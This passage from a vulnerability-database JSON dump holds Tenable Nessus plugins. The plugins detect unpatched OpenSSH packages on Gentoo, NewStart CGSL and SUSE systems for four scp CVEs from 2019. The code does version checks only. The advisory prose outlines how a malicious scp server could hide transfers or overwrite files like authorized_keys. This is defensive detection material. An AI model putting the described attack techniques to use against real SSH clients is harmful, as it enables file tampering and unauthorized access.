5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-03-21T00:00:00", "title": "GLSA-201903-16 : OpenSSH: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:openssh"], "id": "GENTOO_GLSA-201903-16.NASL", "href": "https://www.tenable.com/plugins/nessus/122990", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201903-16.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122990);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/02/03\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n script_xref(name:\"GLSA\", value:\"201903-16\");\n\n script_name(english:\"GLSA-201903-16 : OpenSSH: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201903-16\n(OpenSSH: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in OpenSSH. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could overwrite arbitrary files, transfer malicious\n files, or gain unauthorized access.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201903-16\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All OpenSSH users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/openssh-7.9_p1-r4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/openssh\", unaffected:make_list(\"ge 7.9_p1-r4\"), vulnerable:make_list(\"lt 7.9_p1-r4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenSSH\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T12:02:31", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has openssh packages installed that are affected\nby multiple vulnerabilities:\n\n - In OpenSSH 7.9, scp.c in the scp client allows remote\n SSH servers to bypass intended access restrictions via\n the filename of . or an empty filename. The impact is\n modifying the permissions of the target directory on the\n client side. (CVE-2018-20685)\n\n - An issue was discovered in OpenSSH 7.9. Due to missing\n character encoding in the progress display, a malicious\n server (or Man-in-The-Middle attacker) can employ\n crafted object names to manipulate the client output,\n e.g., by using ANSI control codes to hide additional\n files being transferred. This affects\n refresh_progress_meter() in progressmeter.c.\n (CVE-2019-6109)\n\n - In OpenSSH 7.9, due to accepting and displaying\n arbitrary stderr output from the server, a malicious\n server (or Man-in-The-Middle attacker) can manipulate\n the client output, for example to use ANSI control codes\n to hide additional files being transferred.\n (CVE-2019-6110)\n\n - An issue was discovered in OpenSSH 7.9. Due to the scp\n implementation being derived from 1983 rcp, the server\n chooses which files/directories are sent to the client.\n However, the scp client only performs cursory validation\n of the object name returned (only directory traversal\n attacks are prevented). A malicious scp server (or Man-\n in-The-Middle attacker) can overwrite arbitrary files in\n the scp client target directory. If recursive operation\n (-r) is performed, the server can manipulate\n subdirectories as well (for example, to overwrite the\n .ssh/authorized_keys file). (CVE-2019-6111)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 17, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-08-12T00:00:00", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : openssh Multiple Vulnerabilities (NS-SA-2019-0060)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-08-12T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0060_OPENSSH.NASL", "href": "https://www.tenable.com/plugins/nessus/127253", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0060. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127253);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\n \"CVE-2018-20685\",\n \"CVE-2019-6109\",\n \"CVE-2019-6110\",\n \"CVE-2019-6111\"\n );\n script_bugtraq_id(106531);\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : openssh Multiple Vulnerabilities (NS-SA-2019-0060)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has openssh packages installed that are affected\nby multiple vulnerabilities:\n\n - In OpenSSH 7.9, scp.c in the scp client allows remote\n SSH servers to bypass intended access restrictions via\n the filename of . or an empty filename. The impact is\n modifying the permissions of the target directory on the\n client side. (CVE-2018-20685)\n\n - An issue was discovered in OpenSSH 7.9. Due to missing\n character encoding in the progress display, a malicious\n server (or Man-in-The-Middle attacker) can employ\n crafted object names to manipulate the client output,\n e.g., by using ANSI control codes to hide additional\n files being transferred. This affects\n refresh_progress_meter() in progressmeter.c.\n (CVE-2019-6109)\n\n - In OpenSSH 7.9, due to accepting and displaying\n arbitrary stderr output from the server, a malicious\n server (or Man-in-The-Middle attacker) can manipulate\n the client output, for example to use ANSI control codes\n to hide additional files being transferred.\n (CVE-2019-6110)\n\n - An issue was discovered in OpenSSH 7.9. Due to the scp\n implementation being derived from 1983 rcp, the server\n chooses which files/directories are sent to the client.\n However, the scp client only performs cursory validation\n of the object name returned (only directory traversal\n attacks are prevented). A malicious scp server (or Man-\n in-The-Middle attacker) can overwrite arbitrary files in\n the scp client target directory. If recursive operation\n (-r) is performed, the server can manipulate\n subdirectories as well (for example, to overwrite the\n .ssh/authorized_keys file). (CVE-2019-6111)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0060\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL openssh packages. Note that updated packages may not be available yet. Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL CORE 5.04\": [\n \"openssh-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-askpass-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-cavs-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-clients-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-debuginfo-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-keycat-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-ldap-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-server-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"pam_ssh_agent_auth-0.10.3-6.1.el7.cgslv5.0.7.ga049176\"\n ],\n \"CGSL MAIN 5.04\": [\n \"openssh-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-askpass-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-cavs-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-clients-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-debuginfo-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-keycat-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-ldap-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"openssh-server-7.9p1-1.el7.cgslv5.0.7.ga049176\",\n \"pam_ssh_agent_auth-0.10.3-6.1.el7.cgslv5.0.7.ga049176\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-20T12:54:30", "description": "This update for openssh fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-20685: Fixed an issue where scp client allows\n remote SSH servers to bypass intended access\n restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate\n terminal output via the object name, e.g. by inserting\n ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate stderr\n output, e.g. by inserting ANSI escape sequences\n (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would\n allow malicious remote SSH servers to execute directory\n traversal attacks and overwrite files (bsc#1121821)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "edition": 15, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-29T00:00:00", "title": "openSUSE Security Update : openssh (openSUSE-2019-91)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-29T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo", "p-cpe:/a:novell:opensuse:openssh-askpass-gnome", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:openssh-debuginfo", "p-cpe:/a:novell:opensuse:openssh", "p-cpe:/a:novell:opensuse:openssh-debugsource", "p-cpe:/a:novell:opensuse:openssh-helpers", "p-cpe:/a:novell:opensuse:openssh-cavs", "p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo", "p-cpe:/a:novell:opensuse:openssh-fips"], "id": "OPENSUSE-2019-91.NASL", "href": "https://www.tenable.com/plugins/nessus/121430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-91.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121430);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"openSUSE Security Update : openssh (openSUSE-2019-91)\");\n script_summary(english:\"Check for the openSUSE-2019-91 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-20685: Fixed an issue where scp client allows\n remote SSH servers to bypass intended access\n restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate\n terminal output via the object name, e.g. by inserting\n ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate stderr\n output, e.g. by inserting ANSI escape sequences\n (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would\n allow malicious remote SSH servers to execute directory\n traversal attacks and overwrite files (bsc#1121821)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-cavs-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-cavs-debuginfo-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-debuginfo-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-debugsource-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-fips-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-helpers-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"openssh-helpers-debuginfo-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.6p1-lp150.8.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.6p1-lp150.8.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-askpass-gnome / openssh-askpass-gnome-debuginfo / openssh / etc\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-14T06:16:52", "description": "This update for openssh fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-22T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : openssh (SUSE-SU-2019:0126-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-22T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:openssh-cavs-debuginfo", "p-cpe:/a:novell:suse_linux:openssh", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:openssh-cavs", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2019-0126-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121296", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0126-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121296);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : openssh (SUSE-SU-2019:0126-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for openssh fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-20685/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6109/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6110/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6111/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190126-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8e5cb3b1\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15:zypper in -t\npatch SUSE-SLE-Module-Server-Applications-15-2019-126=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-126=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2019-126=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2019-126=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 